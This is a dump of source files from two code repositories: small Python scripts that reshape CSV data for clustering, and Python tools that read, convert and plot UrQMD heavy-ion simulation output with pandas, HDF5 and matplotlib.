"text": "#! /usr/bin/env python\nimport sys\nimport csv\nimport os.path\nimport datetime\n\n\nwith open(sys.argv[1]) as infile:\n infile = csv.DictReader(infile)\n with open(sys.argv[2], \"w\") as outfile:\n outfile = csv.DictWriter(outfile, infile.fieldnames + ['weight', 'sigma'], 'ignore')\n outfile.writeheader()\n for row in infile:\n row['weight'] = row['score']\n row['sigma'] = '0.0'\n outfile.writerow(row)\n"
},
{
"alpha_fraction": 0.5143885016441345,
"alphanum_fraction": 0.5233812928199768,
"avg_line_length": 29.027027130126953,
"blob_id": "f34a661b87bb13b15315e6bbc0f82c9cf6a46b20",
"content_id": "e2d8c6c02ee1064ff41683cd2772ce2e0b322079",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1112,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 37,
"path": "/split",
"repo_name": "SkyTruth/clustering",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n\nimport sys\nimport csv\nimport os.path\n\ndef parseArgs(argv, *files, **args): \n args = dict(args)\n files = list(files)\n for arg in argv:\n if arg.startswith(\"--\"):\n arg = arg[2:]\n if '=' in arg:\n arg, value = arg.split(\"=\", 1)\n args[arg] = value\n else:\n args[arg] = True\n else:\n files.append(arg)\n return args, files\n\nargs, files = parseArgs(sys.argv[1:],\n timeunit=24*60*60,\n outdir=\".\")\n\nargs[\"timeunit\"] = int(args[\"timeunit\"])\n\nwith open(files[0]) as infile:\n infile = csv.DictReader(infile)\n for row in infile:\n timebucket = int(row['timestamp']) - (int(row['timestamp']) % int(args['timeunit']))\n filename = \"%s/%s.csv\" % (args['outdir'], timebucket)\n is_new = not os.path.exists(filename) \n with open(filename, \"a\") as outfile:\n outfile = csv.DictWriter(outfile, infile.fieldnames, 'ignore')\n if is_new: outfile.writeheader()\n outfile.writerow(row)\n\n"
},
{
"alpha_fraction": 0.6729758381843567,
"alphanum_fraction": 0.687697172164917,
"avg_line_length": 28.71875,
"blob_id": "a72f6eaabf006de88c58122c37c9ade2d3480d8b",
"content_id": "a80cdc30f46df7c780ceeaf4079cd1f4ef2c2a8e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 951,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 32,
"path": "/setup.py",
"repo_name": "SkyTruth/clustering",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python\n\nfrom setuptools.command import easy_install\nfrom setuptools import setup, find_packages\nimport shutil\nimport os.path\nimport sys\nimport hashlib\n\nPKG_DIR = os.path.abspath(os.path.dirname(__file__))\nPKG_NAME = os.path.basename(PKG_DIR)\n\n# Make it possible to overide script wrapping\nold_is_python_script = easy_install.is_python_script\ndef is_python_script(script_text, filename):\n if 'SETUPTOOLS_DO_NOT_WRAP' in script_text:\n return False\n return old_is_python_script(script_text, filename)\neasy_install.is_python_script = is_python_script\n\nsetup(\n name = \"clustering\",\n description = \"Command line tools for scikit-learn\",\n keywords = \"csv cluster\",\n install_requires = [\"scikit-learn>=0.14.1\", \"numpy>=1.8.0\", \"scipy>=0.13.3\"],\n version = \"0.0.1\",\n author = \"Egil Moeller\",\n author_email = \"[email protected]\",\n license = \"GPL\",\n url = \"https://github.com/SkyTruth/clustering\",\n scripts = [\"cluster\"]\n)\n"
},
{
"alpha_fraction": 0.6305732727050781,
"alphanum_fraction": 0.634819507598877,
"avg_line_length": 30.33333396911621,
"blob_id": "dc156cfa563b00aa317451c93a6757e257f5b795",
"content_id": "5c0ad077789ea5a8fd34635afd276876e07862c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 471,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 15,
"path": "/timestamptosec",
"repo_name": "SkyTruth/clustering",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n\nimport sys\nimport csv\nimport os.path\nimport datetime\n\nwith open(sys.argv[1]) as infile:\n infile = csv.DictReader(infile)\n with open(sys.argv[2], \"w\") as outfile:\n outfile = csv.DictWriter(outfile, infile.fieldnames, 'ignore')\n outfile.writeheader()\n for row in infile:\n row['timestamp'] = datetime.datetime.strptime(row['timestamp'], \"%Y-%m-%d %H:%M:%S UTC\").strftime(\"%s\")\n outfile.writerow(row)\n\n"
},
{
"alpha_fraction": 0.6594203114509583,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 31.352941513061523,
"blob_id": "8cea4f373a0ff12e7238d6c6a7d5857e572fe687",
"content_id": "64e6f5de0c20757a4337406b6ea43bd6dec1d5e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 552,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 17,
"path": "/gridify",
"repo_name": "SkyTruth/clustering",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\nimport sys\nimport csv\nimport os.path\nimport datetime\nfrom vectortile import TileBounds\n\nMAX_ZOOM=15\n\nwith open(sys.argv[1]) as infile:\n infile = csv.DictReader(infile)\n with open(sys.argv[2], \"w\") as outfile:\n outfile = csv.DictWriter(outfile, infile.fieldnames + ['gridcode'], 'ignore')\n outfile.writeheader()\n for row in infile:\n row['gridcode'] = str(TileBounds.from_point(lon=float(row['longitude']), lat=float(row['latitude']), zoom_level=MAX_ZOOM))\n outfile.writerow(row)\n\n\n"
}
] | 9 |
pklaus/urqmd-analysis | https://github.com/pklaus/urqmd-analysis | 8fa6a7978553bd93701ac8421f79713e65e8f67f | b1932383fef171af1d195f475a58dabf5ddb7642 | 766e47084e8539447f28e1769cfad11ece47a356 | refs/heads/master | 2021-01-19T13:00:51.465108 | 2014-11-17T00:31:16 | 2014-11-17T00:32:13 | 26,578,855 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5713386535644531,
"alphanum_fraction": 0.5973562598228455,
"avg_line_length": 37.42741775512695,
"blob_id": "31e02404e9a17268be25bb5edfdbe1cb29198626",
"content_id": "2437b24b8b368be79b6d0f4a918341216a184b39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4766,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 124,
"path": "/plot_urqmd_pandas.py",
"repo_name": "pklaus/urqmd-analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n\"\"\" UrQMD File Reader \"\"\"\n\nimport argparse\nimport logging\nimport pandas as pd\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Read a config file.')\n parser.add_argument('hdf5_file', metavar='HDF5_FILE', help=\"The HDF5 file containing the UrQMD events\")\n parser.add_argument('--verbosity', choices=['DEBUG', 'INFO', 'WARNING', 'ERROR'])\n parser.add_argument('--event-no', type=int, help='Total number of events (to scale histograms)')\n args = parser.parse_args()\n\n logging.basicConfig(level=args.verbosity)\n\n hdf = pd.HDFStore(args.hdf5_file)\n df = hdf['particles']\n\n try:\n event_no = len(df['event_id'].unique())\n except:\n if args.event_no: event_no = args.event_no\n else: parser.error('The event_id is not included in the data. You must thus specify --event-no as param.')\n \n df['y'] = .5 * np.log((df.p0 + df.pz)/(df.p0 - df.pz))\n df['mT'] = np.sqrt(df.m**2 + df.px**2 + df.py**2)\n df['mT_weights'] = 1./df.mT**2\n nucleons = df[df.ityp == 1]\n pions = df[df.ityp == 101]\n kaons = df[abs(df.ityp) == 106]\n logging.info(\"{} particles of which {} pions or kaons\".format(len(df), len(pions), len(pions)+len(kaons)))\n \n fig, ax = plt.subplots(1,2, figsize=(10,4))\n\n ### rapidity distribution\n ax[0].set_title('Rapidity Distribution')\n #fig.text(0.35, 0.04, 'rapidity', ha='center', va='center')\n ax[0].set_xlabel('rapidity y / GeV')\n #fig.text(0.10, 0.5, 'dN/dy', ha='center', va='center', rotation='vertical')\n ax[0].set_ylabel('dN/dy')\n bins_rapidity = np.linspace(-4.0, 4.0, num=81)\n # All Particles\n hist, bins = np.histogram(df.y, bins=bins_rapidity)\n #rescale histo:\n for i in range(len(hist)):\n bin_width = bins[1] - bins[0]\n hist[i] = hist[i] / bin_width / event_no\n ax[0].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='grey', label='all particles')\n # Pions\n hist, bins = np.histogram(pions.y, bins=bins_rapidity)\n #rescale histo:\n for i in range(len(hist)):\n bin_width = bins[1] - bins[0]\n hist[i] = hist[i] / bin_width / event_no\n ax[0].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='blue', label='pions')\n prev_hist = hist\n # Nucleons\n hist, bins = np.histogram(nucleons.y, bins=bins_rapidity)\n #rescale histo:\n for i in range(len(hist)):\n bin_width = bins[1] - bins[0]\n hist[i] = hist[i] / bin_width / event_no\n ax[0].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='yellow', label='nucleons', bottom=prev_hist)\n prev_hist += hist\n # Kaons\n hist, bins = np.histogram(kaons.y, bins=bins_rapidity)\n #rescale histo:\n for i in range(len(hist)):\n bin_width = bins[1] - bins[0]\n hist[i] = hist[i] / bin_width / event_no\n ax[0].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='red', label='kaons', bottom=prev_hist)\n ax[0].legend()\n\n ### transverse mass distribution\n ax[1].set_title('Transverse Mass Distribution')\n #fig.text(0.70, 0.04, 'mT / GeV', ha='center', va='center')\n ax[1].set_xlabel('dN/dy')\n #fig.text(0.50, 0.5, '1/mT^2 dN/dmT', ha='center', va='center', rotation='vertical')\n ax[1].set_ylabel('1/mT^2 dN/dmT')\n # We use the rapidity cut: |y| < 1.0\n nucleons = nucleons[np.abs(nucleons.y) < 1.0]\n pions = pions[np.abs(pions.y) < 1.0]\n kaons = kaons[np.abs(kaons.y) < 1.0]\n bins_mT = np.linspace(0.0, 4.0, num=81)\n # Nucleons\n hist, bins = np.histogram(nucleons.mT, weights=nucleons.mT_weights, bins=bins_mT)\n #rescale histo:\n for i in range(len(hist)):\n bin_width = bins[1] - bins[0]\n hist[i] = hist[i] / 
    df['y'] = .5 * np.log((df.p0 + df.pz)/(df.p0 - df.pz))\n    df['mT'] = np.sqrt(df.m**2 + df.px**2 + df.py**2)\n    df['mT_weights'] = 1./df.mT**2\n    nucleons = df[df.ityp == 1]\n    pions = df[df.ityp == 101]\n    kaons = df[abs(df.ityp) == 106]\n    logging.info(\"{} particles of which {} pions or kaons\".format(len(df), len(pions) + len(kaons)))\n\n    fig, ax = plt.subplots(1,2, figsize=(10,4))\n\n    ### rapidity distribution\n    ax[0].set_title('Rapidity Distribution')\n    ax[0].set_xlabel('rapidity y')\n    ax[0].set_ylabel('dN/dy')\n    bins_rapidity = np.linspace(-4.0, 4.0, num=81)\n    # All Particles\n    hist, bins = np.histogram(df.y, bins=bins_rapidity)\n    # rescale to dN/dy per event (float division, the raw counts are integers)\n    hist = hist / (bins[1] - bins[0]) / event_no\n    ax[0].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='grey', label='all particles')\n    # Pions\n    hist, bins = np.histogram(pions.y, bins=bins_rapidity)\n    hist = hist / (bins[1] - bins[0]) / event_no\n    ax[0].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='blue', label='pions')\n    prev_hist = hist\n    # Nucleons\n    hist, bins = np.histogram(nucleons.y, bins=bins_rapidity)\n    hist = hist / (bins[1] - bins[0]) / event_no\n    ax[0].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='yellow', label='nucleons', bottom=prev_hist)\n    prev_hist += hist\n    # Kaons\n    hist, bins = np.histogram(kaons.y, bins=bins_rapidity)\n    hist = hist / (bins[1] - bins[0]) / event_no\n    ax[0].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='red', label='kaons', bottom=prev_hist)\n    ax[0].legend()\n\n    ### transverse mass distribution\n    ax[1].set_title('Transverse Mass Distribution')\n    ax[1].set_xlabel('mT / GeV')\n    ax[1].set_ylabel('1/mT^2 dN/dmT')\n    # We use the rapidity cut: |y| < 1.0\n    nucleons = nucleons[np.abs(nucleons.y) < 1.0]\n    pions = pions[np.abs(pions.y) < 1.0]\n    kaons = kaons[np.abs(kaons.y) < 1.0]\n    bins_mT = np.linspace(0.0, 4.0, num=81)\n    # Nucleons\n    hist, bins = np.histogram(nucleons.mT, weights=nucleons.mT_weights, bins=bins_mT)\n    hist = hist / (bins[1] - bins[0]) / event_no\n    ax[1].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='yellow', log=True, fill=True, label='nucleons')\n    # Pions\n    hist, bins = np.histogram(pions.mT, weights=pions.mT_weights, bins=bins_mT)\n    hist = hist / (bins[1] - bins[0]) / event_no\n    ax[1].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='blue', log=True, fill=True, label='pions')\n    # Kaons\n    hist, bins = np.histogram(kaons.mT, weights=kaons.mT_weights, bins=bins_mT)\n    hist = hist / (bins[1] - bins[0]) / event_no\n    ax[1].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='red', log=True, fill=True, label='kaons')\n    ax[1].legend()\n    fig.show()\n\n    # Fitting the temperature\n    def decay(x, x_p, y_p, y0, x0):\n        return y0 + y_p * np.exp(-(x-x0)*x_p)\n\n    import pdb; pdb.set_trace()\n    hdf.close()\n\n\nif __name__ == \"__main__\":\n    main()\n\n"
},
{
"alpha_fraction": 0.579365074634552,
"alphanum_fraction": 0.5943722724914551,
"avg_line_length": 33.819095611572266,
"blob_id": "5c1cc260dbb2ba9485b7f8d3c12b0c39d8e896a0",
"content_id": "93f4c9f476640965439932afdaa8af98b87e1999",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6930,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 199,
"path": "/plot_urqmd.py",
"repo_name": "pklaus/urqmd-analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n\"\"\" UrQMD File Reader \"\"\"\n\nfrom read_urqmd import F14_Reader\nimport argparse\nimport pickle\nimport logging\nimport pandas as pd\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass Particle(object):\n\n def __init__(self, properties):\n self._properties = properties\n # precalculate expensive values:\n self._mT = math.sqrt(self.m0**2 + self.px**2 + self.py**2)\n\n @property\n def id(self):\n return int(self._properties[9])\n\n @property\n def time(self):\n return float(self._properties[0])\n\n @property\n def E(self):\n return float(self._properties[4])\n\n @property\n def px(self):\n return float(self._properties[5])\n\n @property\n def py(self):\n return float(self._properties[6])\n\n @property\n def pz(self):\n return float(self._properties[7])\n\n @property\n def m0(self):\n return float(self._properties[8])\n\n @property\n def mT(self):\n return self._mT\n\n @property\n def y(self):\n \"\"\" rapidity \"\"\"\n return .5 * math.log((self.E + self.pz)/(self.E - self.pz))\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Read a config file.')\n parser.add_argument('urqmd_file', metavar='URQMD_FILE', type=argparse.FileType('r'), help=\"Must be of type .f14\")\n parser.add_argument('--verbosity', choices=['DEBUG', 'INFO', 'WARNING', 'ERROR'])\n args = parser.parse_args()\n\n logging.basicConfig(level=args.verbosity)\n\n events = []\n event_number = []\n particle_number = []\n particle_y = []\n nucleon_y = []\n nucleon_number = []\n pion_number = []\n kaon_number = []\n pion_y = []\n pion_mT = []\n pion_mT_weights = []\n kaon_y = []\n kaon_mT = []\n kaon_mT_weights = []\n particle_mT = []\n particle_mT_weights = []\n nucleon_mT = []\n nucleon_mT_weights = []\n for event in F14_Reader(args.urqmd_file).get_events():\n events.append(event)\n event_number.append(event['id'])\n particles = [Particle(particle_properties) for particle_properties in event['particle_properties']]\n particle_y += [particle.y for particle in particles]\n particle_mT += [particle.mT for particle in particles if abs(particle.y) < 1.0]\n particle_mT_weights += [1/particle.mT**2 for particle in particles if abs(particle.y) < 1.0]\n nucleons = [particle for particle in particles if particle.id == 1]\n pions = [particle for particle in particles if particle.id == 101]\n kaons = [particle for particle in particles if abs(particle.id) == 106]\n nucleon_number.append(len(nucleons))\n pion_number.append(len(pions))\n kaon_number.append(len(kaons))\n for nucleon in nucleons:\n nucleon_y.append(nucleon.y)\n if abs(nucleon.y) < 1.0:\n nucleon_mT.append(nucleon.mT)\n # weights for the histogram\n # http://docs.scipy.org/doc/numpy/reference/generated/numpy.histogram.html\n nucleon_mT_weights.append(1/nucleon.mT**2)\n for pion in pions:\n pion_y.append(pion.y)\n if abs(pion.y) < 1.0:\n pion_mT.append(pion.mT)\n # weights for the histogram\n # http://docs.scipy.org/doc/numpy/reference/generated/numpy.histogram.html\n pion_mT_weights.append(1/pion.mT**2)\n for kaon in kaons:\n kaon_y.append(kaon.y)\n if abs(kaon.y) < 1.0:\n kaon_mT.append(kaon.mT)\n # weights for the histogram\n # http://docs.scipy.org/doc/numpy/reference/generated/numpy.histogram.html\n kaon_mT_weights.append(1/kaon.mT**2)\n particle_number.append(len(particles))\n logging.info(\"Event #{}: {} particles of which {} pions or kaons\".format(event['id'], len(particles), len(pions)+len(kaons)))\n \n df_physics = pd.DataFrame({'particles': particle_number, 'pions': pion_number, 'kaons': 
class Particle(object):\n\n    def __init__(self, properties):\n        self._properties = properties\n        # precalculate expensive values:\n        self._mT = math.sqrt(self.m0**2 + self.px**2 + self.py**2)\n\n    @property\n    def id(self):\n        return int(self._properties[9])\n\n    @property\n    def time(self):\n        return float(self._properties[0])\n\n    @property\n    def E(self):\n        return float(self._properties[4])\n\n    @property\n    def px(self):\n        return float(self._properties[5])\n\n    @property\n    def py(self):\n        return float(self._properties[6])\n\n    @property\n    def pz(self):\n        return float(self._properties[7])\n\n    @property\n    def m0(self):\n        return float(self._properties[8])\n\n    @property\n    def mT(self):\n        return self._mT\n\n    @property\n    def y(self):\n        \"\"\" rapidity \"\"\"\n        return .5 * math.log((self.E + self.pz)/(self.E - self.pz))\n\n\ndef main():\n    parser = argparse.ArgumentParser(description='Plot rapidity and transverse mass distributions from an UrQMD .f14 file.')\n    parser.add_argument('urqmd_file', metavar='URQMD_FILE', type=argparse.FileType('r'), help=\"Must be of type .f14\")\n    parser.add_argument('--verbosity', choices=['DEBUG', 'INFO', 'WARNING', 'ERROR'])\n    args = parser.parse_args()\n\n    logging.basicConfig(level=args.verbosity)\n\n    events = []\n    event_number = []\n    particle_number = []\n    particle_y = []\n    nucleon_y = []\n    nucleon_number = []\n    pion_number = []\n    kaon_number = []\n    pion_y = []\n    pion_mT = []\n    pion_mT_weights = []\n    kaon_y = []\n    kaon_mT = []\n    kaon_mT_weights = []\n    particle_mT = []\n    particle_mT_weights = []\n    nucleon_mT = []\n    nucleon_mT_weights = []\n    for event in F14_Reader(args.urqmd_file).get_events():\n        events.append(event)\n        event_number.append(event['id'])\n        particles = [Particle(particle_properties) for particle_properties in event['particle_properties']]\n        particle_y += [particle.y for particle in particles]\n        particle_mT += [particle.mT for particle in particles if abs(particle.y) < 1.0]\n        particle_mT_weights += [1/particle.mT**2 for particle in particles if abs(particle.y) < 1.0]\n        nucleons = [particle for particle in particles if particle.id == 1]\n        pions = [particle for particle in particles if particle.id == 101]\n        kaons = [particle for particle in particles if abs(particle.id) == 106]\n        nucleon_number.append(len(nucleons))\n        pion_number.append(len(pions))\n        kaon_number.append(len(kaons))\n        for nucleon in nucleons:\n            nucleon_y.append(nucleon.y)\n            if abs(nucleon.y) < 1.0:\n                nucleon_mT.append(nucleon.mT)\n                # weights for the histogram\n                # http://docs.scipy.org/doc/numpy/reference/generated/numpy.histogram.html\n                nucleon_mT_weights.append(1/nucleon.mT**2)\n        for pion in pions:\n            pion_y.append(pion.y)\n            if abs(pion.y) < 1.0:\n                pion_mT.append(pion.mT)\n                # weights for the histogram\n                # http://docs.scipy.org/doc/numpy/reference/generated/numpy.histogram.html\n                pion_mT_weights.append(1/pion.mT**2)\n        for kaon in kaons:\n            kaon_y.append(kaon.y)\n            if abs(kaon.y) < 1.0:\n                kaon_mT.append(kaon.mT)\n                # weights for the histogram\n                # http://docs.scipy.org/doc/numpy/reference/generated/numpy.histogram.html\n                kaon_mT_weights.append(1/kaon.mT**2)\n        particle_number.append(len(particles))\n        logging.info(\"Event #{}: {} particles of which {} pions or kaons\".format(event['id'], len(particles), len(pions)+len(kaons)))\n\n    df_events = pd.DataFrame({'particles': particle_number, 'pions': pion_number, 'kaons': kaon_number}, index=event_number)\n    print(df_events.describe())\n\n    event_no = len(events)\n\n    fig, ax = plt.subplots(1,2, figsize=(10,4))\n\n    ### rapidity distribution\n    ax[0].set_title('Rapidity Distribution')\n    ax[0].set_xlabel('rapidity y')\n    ax[0].set_ylabel('dN/dy')\n    bins_rapidity = 50\n    # All Particles\n    hist, bins = np.histogram(particle_y, bins=bins_rapidity)\n    # rescale to dN/dy per event (float division, the raw counts are integers)\n    hist = hist / (bins[1] - bins[0]) / event_no\n    ax[0].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='grey', label='all particles')\n    # Pions\n    hist, bins = np.histogram(pion_y, bins=bins_rapidity)\n    hist = hist / (bins[1] - bins[0]) / event_no\n    ax[0].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='blue', label='pions')\n    # Nucleons\n    hist, bins = np.histogram(nucleon_y, bins=bins_rapidity)\n    hist = hist / (bins[1] - bins[0]) / event_no\n    ax[0].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='yellow', label='nucleons')\n    # Kaons\n    hist, bins = np.histogram(kaon_y, bins=bins_rapidity)\n    hist = hist / (bins[1] - bins[0]) / event_no\n    ax[0].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='red', label='kaons')\n    ax[0].legend()\n\n    ### transverse mass distribution\n    ax[1].set_title('Transverse Mass Distribution')\n    ax[1].set_xlabel('mT / GeV')\n    ax[1].set_ylabel('1/mT^2 dN/dmT')\n    bins_mT = 80\n    # Nucleons\n    hist, bins = np.histogram(nucleon_mT, weights=nucleon_mT_weights, bins=bins_mT)\n    hist = hist / (bins[1] - bins[0]) / event_no\n    ax[1].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='yellow', log=True, fill=True, label='nucleons')\n    # Pions\n    hist, bins = np.histogram(pion_mT, weights=pion_mT_weights, bins=bins_mT)\n    hist = hist / (bins[1] - bins[0]) / event_no\n    ax[1].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='blue', log=True, fill=True, label='pions')\n    # Kaons\n    hist, bins = np.histogram(kaon_mT, weights=kaon_mT_weights, bins=bins_mT)\n    hist = hist / (bins[1] - bins[0]) / event_no\n    ax[1].bar(bins[:-1], hist, width=(bins[1]-bins[0]), color='red', log=True, fill=True, label='kaons')\n    ax[1].legend()\n    fig.show()\n    import pdb; pdb.set_trace()\n\n\nif __name__ == \"__main__\":\n    main()\n\n"
},
{
"alpha_fraction": 0.5529506802558899,
"alphanum_fraction": 0.5618431568145752,
"avg_line_length": 27.744186401367188,
"blob_id": "f90b1a6a907087cd22951ff6f57e527431985220",
"content_id": "1f07271f0c0add689ce185dac0d9fbb0dfa33111",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1237,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 43,
"path": "/read_urqmd.py",
"repo_name": "pklaus/urqmd-analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n\"\"\" UrQMD File Reader \"\"\"\n\nimport argparse\nimport pickle\nimport logging\n\n\nclass F14_Reader(object):\n\n def __init__(self, data_file):\n self.data_file = data_file\n\n def get_events(self):\n new_event = False\n event = None\n for line in self.data_file:\n parts = line.split()\n if not len(parts): continue\n if parts[0] == 'UQMD': new_event = True\n if new_event:\n if event: yield event\n event = dict()\n event['particle_properties'] = []\n new_event = False\n if parts[0] == 'event#': event['id'] = int(parts[1])\n if len(parts) == 15:\n event['particle_properties'].append(parts)\n if event: yield event\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Read a config file.')\n parser.add_argument('urqmd_file', metavar='URQMD_FILE', type=argparse.FileType('r'), help=\"Must be of type .f14\")\n args = parser.parse_args()\n\n for event in F14_Reader(args.urqmd_file).get_events():\n print(\"Event #{} containing {} particles\".format(event['id'], len(event['particle_properties'])))\n\n\nif __name__ == \"__main__\":\n main()\n\n"
},
{
"alpha_fraction": 0.745726466178894,
"alphanum_fraction": 0.75,
"avg_line_length": 37.83333206176758,
"blob_id": "77c8f7dbcc9ba56dfe834c508edbe88e35612735",
"content_id": "3fe6cf54e991e7f6711fc774a018467ba7853f24",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 468,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 12,
"path": "/README.md",
"repo_name": "pklaus/urqmd-analysis",
"src_encoding": "UTF-8",
"text": "\n# Analyze UrQMD Events with Python\n\nThis Python code was created to read the output files written by heavy ion collision simulations with UrQMD.\n\n### Other Related Code / Alternatives\n\n* [urqmd-observables](https://github.com/jbernhard/urqmd-observables), C++ code to read UrQMD `.f13` output files.\n* [ebe-analysis - Tools for analyzing event-by-event heavy-ion collision simulation data.](https://github.com/jbernhard/ebe-analysis)\n\n### Author\n\n* Philipp Klaus <[email protected]>\n\n"
},
{
"alpha_fraction": 0.54130619764328,
"alphanum_fraction": 0.5555555820465088,
"avg_line_length": 42.65925979614258,
"blob_id": "2151b28ebdb14879eecd7cd483506223a3562bac",
"content_id": "e89d60c3d8949de99a3206d50eeb1e1dd49d18cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5895,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 135,
"path": "/read_urqmd_pandas.py",
"repo_name": "pklaus/urqmd-analysis",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n\"\"\" UrQMD File Reader \"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport tables\nimport argparse\nimport logging\nimport warnings\nimport multiprocessing\nimport time\nimport queue\n\n\nclass F14_Reader(object):\n\n def __init__(self, data_file, add_event_columns=False, renumber_event_ids=True):\n self.data_file = data_file\n self.add_event_columns = add_event_columns\n self.renumber_event_ids = renumber_event_ids\n\n def get_dataframe(self):\n return pd.concat(list(self.iter_dataframes()), ignore_index=True)\n\n def iter_dataframes(self, chunksize=100000):\n curr_event_id = 0\n curr_impact = 0.0\n names = ['r0', 'rx', 'ry', 'rz', 'p0', 'px', 'py', 'pz', 'm', 'ityp', '2i3', 'chg', 'lcl#', 'ncl', 'or']\n for df in pd.read_table(self.data_file, names=names, delim_whitespace=True, chunksize=chunksize):\n logging.info('Read {} lines from {}.'.format(len(df), self.data_file.name))\n # -- add additional event_* columns\n if self.add_event_columns:\n #total_event_no = len(df[df.r0 == 'UQMD'])\n df['event_id'] = curr_event_id\n df['event_ip'] = curr_impact\n event_start = None\n for idx in df[df.r0 == 'UQMD'].index:\n # remember the index where the event started\n if event_start == None:\n event_start = idx\n continue\n curr_impact = df.loc[event_start+3, 'rx']\n # set curr_event_id\n if self.renumber_event_ids:\n curr_event_id += 1\n else:\n curr_event_id = df.loc[event_start+5, 'rx']\n # update event_id and event_ip for the event from event_start (the current event) to idx (the new event)\n df.loc[event_start:idx, 'event_ip'] = curr_impact\n df.loc[event_start:idx, 'event_id'] = curr_event_id\n event_start = idx\n # update particles belonging to the last event\n curr_impact = df.loc[event_start+3, 'rx']\n if self.renumber_event_ids:\n curr_event_id += 1\n else:\n curr_event_id = df.loc[event_start + 5, 'rx']\n df.loc[event_start:, 'event_id'] = curr_event_id\n df.loc[event_start:, 'event_ip'] = curr_impact\n # -- end add event_* columns\n df = df[df['or'].notnull()]\n df = df.convert_objects(convert_numeric=True)\n df.dropna(how='any', inplace=True)\n if self.add_event_columns:\n df['event_id'] = df['event_id'].astype(np.uint32)\n df['event_ip'] = df['event_ip'].astype(np.float32)\n df['r0'] = df['r0'].astype(np.float32)\n df['rx'] = df['rx'].astype(np.float32)\n df['ry'] = df['ry'].astype(np.float32)\n df['rz'] = df['rz'].astype(np.float32)\n df['p0'] = df['p0'].astype(np.float32)\n df['px'] = df['px'].astype(np.float32)\n df['py'] = df['py'].astype(np.float32)\n df['pz'] = df['pz'].astype(np.float32)\n df['m'] = df['m'].astype(np.float32)\n df['ityp'] = df['ityp'].astype(np.int16)\n df['2i3'] = df['2i3'].astype(np.int8)\n df['chg'] = df['chg'].astype(np.int8)\n df['lcl#'] = df['lcl#'].astype(np.uint32)\n df['ncl'] = df['ncl'].astype(np.uint16)\n df['or'] = df['or'].astype(np.uint16)\n yield df\n\n\nclass HDF_Worker(multiprocessing.Process):\n\n def __init__(self, h5_path, queue):\n self.h5_path = h5_path\n self.queue = queue\n self.block_period = .01\n super(HDF_Worker, self).__init__()\n\n def run(self):\n self.hdf = pd.HDFStore(self.h5_path)\n original_warnings = list(warnings.filters)\n warnings.simplefilter('ignore', tables.NaturalNameWarning)\n while True:\n try:\n # get queue content\n qc = self.queue.get(timeout=self.block_period)\n except queue.Empty:\n continue\n if type(qc) == str and qc == 'EOF': break\n self.hdf.append('particles', qc, data_columns=True, index=False)\n self.hdf.close()\n warnings.filters = original_warnings\n\n\ndef 
